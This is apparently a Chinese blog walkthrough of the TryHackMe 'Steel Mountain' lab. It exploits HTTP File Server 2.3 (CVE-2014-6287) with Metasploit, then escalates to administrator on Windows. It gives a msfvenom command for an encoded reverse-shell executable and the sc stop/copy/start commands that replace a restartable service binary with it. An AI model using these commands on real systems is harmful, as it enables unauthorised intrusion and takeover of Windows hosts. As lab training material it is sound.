初期信息搜集


两个网站端口,80显示了当前值班的员工,8080是本次的重点
HTTP file server 2.3这个最近刚出了
CVE,但考的是CVE-2014-6287msf直接打就行,注意端口冲突进去后去桌面翻一翻,找到flag
PowerUP实现Windows提权通过向目标靶机上传并运行
PowerUP脚本来检测把集中可能存在的服务器脆弱点通过
metepreter会话来上传并执行:1
2
3
4
5
6
7
8
9upload /home/kali/Desktop/PowerUp.ps1
load powershell # 加载powershell脚本
powershell_shell # 进入
Import-Module .\PowerUp.ps1
Invoke-AllChecks

注意这里,扫描到了可以重启的服务,即
CanRestart为true。那么就像linux提权一样,用恶意程序覆盖当前的ASCService并重启就能执行提取那么直接
msfvenom生成个同名的木马msfvenom -p windows/shell_reverse_tcp LHOST=10.11.99.99 LPORT=1233 -e x86/shikata_ga_nai -f exe -o ASCService.exe
上传后用终端终止原进程并替换成木马:
1
2
3sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

然后监听端口,并用
sc start启动进程
获得管理员权限后在
Administrator/Desktop找到root.txt
THM打靶日寄2-steel mountain
- 本文链接: http://noone40404.github.io/thm-steel-mountain/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!